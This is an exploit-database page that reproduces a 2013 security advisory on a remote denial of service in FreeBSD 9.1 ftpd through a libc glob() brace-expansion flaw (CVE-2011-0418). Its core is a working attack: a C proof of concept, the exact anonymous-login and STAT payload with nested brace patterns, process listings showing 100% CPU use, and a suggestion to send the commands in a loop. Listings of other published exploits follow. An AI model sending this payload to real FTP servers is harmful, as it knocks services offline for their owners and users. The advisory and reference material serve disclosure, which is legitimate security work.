Search for hundreds of thousands of exploits

"FreeBSD 9.1 - 'ftpd' Remote Denial of Service"

Author

Exploit author

"Maksymilian Arciemowicz"

Platform

Exploit platform

freebsd

Release date

Exploit published date

2013-02-05

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old
bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU
resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
sending 'STAT' command with special wildchar, enought to create ftpd
process with 100% CPU usage.

Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(){
		glob_t globbuf;
		char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
		glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp     13034   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.96
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13035   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.89
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13036   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.73
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13046   0.0  0.4  10416   1952  ??  R    10:48PM    0:00.41
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13047   0.0  0.4  10416   1960  ??  R    10:48PM    0:00.42
ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root    13219   0.0  0.3  10032   1424  ??  R    10:52PM    0:00.00
/usr/libexec/ftpd -dDA
root    13225   0.0  0.3  10032   1428  ??  R    10:52PM    0:00.00
/usr/libexec/ftpd -dDA
root    13409   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
/usr/libexec/ftpd -dDA
root    13410   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
/usr/libexec/ftpd -dDA
...

=>Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=>Result:
@ps:
ftp      1336 100.0  0.5  10416   2360  ??  R    11:15PM 600:39.95
ftpd: 127.0.0.1: anonymous/anonymous@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root        1 103    0 10416K  2360K RUN    600:53 100.00% ftpd

one request over 600m (~10h) execution time and 100% CPU usage. This
issue allow to create N ftpd processes with 100% CPU usage.

Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
	if (strpbrk(whichf, "~{[*?") != NULL) {
		int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

		memset(&gl, 0, sizeof(gl));
		gl.gl_matchc = MAXGLOBARGS;
		flags |= GLOB_LIMIT;
		freeglob = 1;
		if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected


--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233


--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
problem with security ;)


--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632

Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418

More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399

The regcomp implementation in the GNU C Library allows attackers to
cause a denial of service proftpd
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279


--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/
Release DateTitleTypePlatformAuthor
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepçe"
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-07"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"remotexmlhyp3rlinx
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
Release DateTitleTypePlatformAuthor
2020-04-06"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting"webappsfreebsd"Matthew Aberegg"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2019-12-30"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation"localfreebsd"Karsten König"
2019-12-30"FreeBSD-SA-19:02.fd - Privilege Escalation"localfreebsd"Karsten König"
2019-07-10"FreeBSD 12.0 - 'fd' Local Privilege Escalation"localfreebsdgr4yf0x
2016-01-25"FreeBSD SCTP ICMPv6 - Error Processing"dosfreebsdptsecurity
2015-01-29"FreeBSD - Multiple Vulnerabilities"dosfreebsd"Core Security"
2013-10-04"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"localfreebsdCurcolHekerLink
2013-06-26"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)"localfreebsdMetasploit
2013-06-21"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation"localfreebsdHunger
Release DateTitleTypePlatformAuthor
2016-12-12"iOS 10.1.x - Certificate File Memory Corruption"dosios"Maksymilian Arciemowicz"
2015-12-09"Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow"dososx"Maksymilian Arciemowicz"
2014-04-08"Apple Mac OSX 10.9 - Hard Link Memory Corruption"dososx"Maksymilian Arciemowicz"
2013-02-05"FreeBSD 9.1 - 'ftpd' Remote Denial of Service"dosfreebsd"Maksymilian Arciemowicz"
2012-01-14"PHP 5.3.8 - Multiple Vulnerabilities"dosmultiple"Maksymilian Arciemowicz"
2011-11-04"Libc - 'regcomp()' Stack Exhaustion Denial of Service"dosmultiple"Maksymilian Arciemowicz"
2011-08-19"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities"dosphp"Maksymilian Arciemowicz"
2011-07-01"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows"remotebsd"Maksymilian Arciemowicz"
2011-05-12"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service"doslinux"Maksymilian Arciemowicz"
2011-03-18"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference"doslinux"Maksymilian Arciemowicz"
2011-03-02"vsftpd 2.3.2 - Denial of Service"doslinux"Maksymilian Arciemowicz"
2011-02-17"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service"dosphp"Maksymilian Arciemowicz"
2011-02-17"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference"doslinux"Maksymilian Arciemowicz"
2011-01-07"GNU libc/regcomp(3) - Multiple Vulnerabilities"doslinux"Maksymilian Arciemowicz"
2010-12-10"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow"dosmultiple"Maksymilian Arciemowicz"
2010-12-07"GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service"doslinux"Maksymilian Arciemowicz"
2010-11-05"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference"dosphp"Maksymilian Arciemowicz"
2010-10-07"libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)"dosmultiple"Maksymilian Arciemowicz"
2010-09-08"FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition"dosbsd"Maksymilian Arciemowicz"
2010-05-27"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)"dosfreebsd"Maksymilian Arciemowicz"
2010-05-21"Sun Solaris 10 - Nested Directory Tree Local Denial of Service"dossolaris"Maksymilian Arciemowicz"
2010-05-21"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security"dossolaris"Maksymilian Arciemowicz"
2010-04-24"Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)"dososx"Maksymilian Arciemowicz"
2010-01-08"Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption"dososx"Maksymilian Arciemowicz"
2010-01-08"MATLAB R2009b - 'dtoa' Implementation Memory Corruption"doslinux"Maksymilian Arciemowicz"
2009-12-19"PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass"localphp"Maksymilian Arciemowicz"
2009-12-03"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure"localphp"Maksymilian Arciemowicz"
2009-11-20"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution"remotemultiple"Maksymilian Arciemowicz"
2009-11-20"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution"remotelinux"Maksymilian Arciemowicz"
2009-11-13"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities"remotephp"Maksymilian Arciemowicz"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/24450/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.